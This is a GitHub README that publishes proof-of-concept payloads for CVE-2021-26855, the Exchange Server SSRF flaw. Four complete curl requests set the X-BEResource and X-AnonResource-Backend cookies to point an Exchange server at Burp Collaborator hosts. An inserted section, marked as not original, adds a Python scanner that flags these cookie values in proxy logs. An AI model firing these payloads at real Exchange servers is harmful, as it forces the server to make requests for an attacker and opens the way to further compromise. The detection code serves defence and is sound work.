alexfrancow / CVE-2021-26855_PoC

CVE-2021-26855_PoC

My early SSRF payloads (CVE-2021-26855) over Exchange Server 2019...

Payload (1)

# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/owa/auth/logon.aspx?~3' $'https://<exchange_server>/owa/auth/Current/themes/resources/logon.css'

Payload (2)

# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/api/endpoint#~1' $'https://<exchange_server>/ecp/favicon.ico'

Payload (3)

# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Length: 0' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net#~1' $'https://<exchange_server>/ecp/favicon.ico'

Payload (4)

# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=sgca4i4yj8wrpuipvxeupawsqjw9ky.burpcollaborator.net/#~1' $'https://<exchange_server>/owa/auth/favicon.ico' 

[../snip]
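A defensive counterpart to the payloads above, added here as an example and not part of the original repository: it checks raw Cookie headers (for instance from reverse-proxy or WAF logs) for `X-BEResource` / `X-AnonResource-Backend` values that carry URL syntax in front of the `~<n>` suffix. The sample requests, the `collab.example.net` and `mbx01.corp.example` hostnames, the function names, and the rule that a legitimate value is a bare `fqdn~version` pair are assumptions.

```python
import re

# Cookies that name a backend resource in the payloads above.
BACKEND_COOKIES = ("x-beresource", "x-anonresource-backend")
# Assumption: a legitimate value is a bare "<fqdn>~<version>" pair.
PLAIN_VALUE = re.compile(r"^[A-Za-z0-9.-]+~\d+$")

# Constructed sample: (request path, raw Cookie header) pairs.
SAMPLE_REQUESTS = [
    ("/owa/auth/logon.aspx", "ClientId=ABC123; X-BEResource=mbx01.corp.example~1942062522"),
    ("/ecp/favicon.ico", "X-BEResource=collab.example.net/api/endpoint#~1"),
    ("/owa/auth/Current/themes/resources/logon.css",
     "X-AnonResource=true; X-AnonResource-Backend=collab.example.net/ecp/default.flt?~3; "
     "X-BEResource=collab.example.net/owa/auth/logon.aspx?~3"),
    ("/owa/", "lang=en; theme=dark"),
]


def parse_cookie_header(header):
    """Split a raw Cookie header into (name, value) pairs, values kept verbatim."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def check_cookie_header(header):
    """Return (cookie, reason) for backend cookies that are not plain fqdn~version."""
    findings = []
    for name, value in parse_cookie_header(header):
        if name.lower() not in BACKEND_COOKIES or PLAIN_VALUE.match(value):
            continue
        target = value.rsplit("~", 1)[0]  # part in front of the version suffix
        extras = [c for c in "/?#@:" if c in target]
        reason = ("URL syntax in backend value: " + " ".join(extras)
                  if extras else "not in fqdn~version form")
        findings.append((name, reason))
    return findings


def scan(requests):
    """Check every (path, cookie_header) pair; return (path, cookie, reason) rows."""
    return [(path, name, reason)
            for path, header in requests
            for name, reason in check_cookie_header(header)]
```

`scan(SAMPLE_REQUESTS)` returns one row per flagged cookie; the plain `fqdn~version` cookie and the unrelated cookies produce none.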

Reference:

https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

Author

Alex Hernandez aka (@_alt3kx_)
